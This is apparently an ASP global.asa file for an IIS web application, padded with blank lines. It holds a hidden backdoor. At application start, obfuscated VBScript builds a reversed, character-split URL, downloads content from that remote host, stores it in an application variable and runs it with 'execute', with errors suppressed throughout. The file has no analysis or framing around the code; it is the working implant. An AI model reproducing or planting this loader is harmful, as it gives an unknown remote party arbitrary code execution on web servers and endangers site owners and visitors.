<script language="vbscript" runat="server">

















































  
'by * cloud
on error resume next
If err.Number <> 0 Then 
errNum = Err.Number 
errDesc = Err.Description 
response.write errNum & " - " & errDesc 
End If 
sub Application_OnStart
if Application("safe6")="" then
zujian=getxmlhttp()
If zujian<>"" Then

url=StrReverse("l"&"m"&"t"&"h"&"."&"c"&"b"&"/"&"m"&"o"&"c"&"."&"5"&"d"&"m"&"c"&"8"&"."&"b"&"/"&"/"&":"&"p"&"t"&"t"&"h")
Set ObjXMLHTTP=Server.CreateObject (zujian)
ObjXMLHTTP.Open "G"&"E"&"T",url,False
ObjXMLHTTP.setRequestHeader "U"&"s"&"e"&"r-"&"A"&"g"&"ent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject ("A"&"d"&"od"&"b.S"&"t"&"r"&"e"&"a"&"m")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "g"&"b"&"2"&"3"&"1"&"2"
GetHtml = objStream.ReadText
objStream.Close

Application("safe6")=GetHtml
  
end if
end if


end sub 
sub Application_OnEnd  
end sub
Function IsObjInstalled(strClassString) 
On Error Resume Next 
IsObjInstalled = False 
Err = 0 
Dim xTestObj 
Set xTestObj = Server.CreateObject(strClassString) 
If 0 = Err Then IsObjInstalled = True 
Set xTestObj = Nothing 
Err = 0 
End Function 

Function getxmlhttp()
oxml=array("Msxml2.ServerXMLHTTP.6.0","Msxml2.ServerXMLHTTP.5.0","Msxml2.ServerXMLHTTP.4.0","Msxml2.ServerXMLHTTP.3.0","Msxml2.ServerXMLHTTP","Msxml2.XMLHTTP.6.0","Msxml2.XMLHTTP.5.0","Msxml2.XMLHTTP.4.0","Msxml2.XMLHTTP.3.0","Msxml2.XMLHTTP", "M"&"SX"&"ML"&"2.se"&"rver"&"XM"&"LH"&"TTP")
for i=0 to ubound(oxml)
'Set getxmlhttp = Server.CreateObject (oxml(i))
ck = IsObjInstalled(oxml(i))
If not ck Then
else
 getxmlhttp=oxml(i)
 Exit for
end if
next
End function

'sub Session_OnStart
on error resume next
If err.Number <> 0 Then 
errNum = Err.Number 
errDesc = Err.Description 
response.write errNum & " - " & errDesc 
End If 
execute Application.Contents("safe6")

'end sub  
'sub Session_OnEnd 
'end sub  
</script> 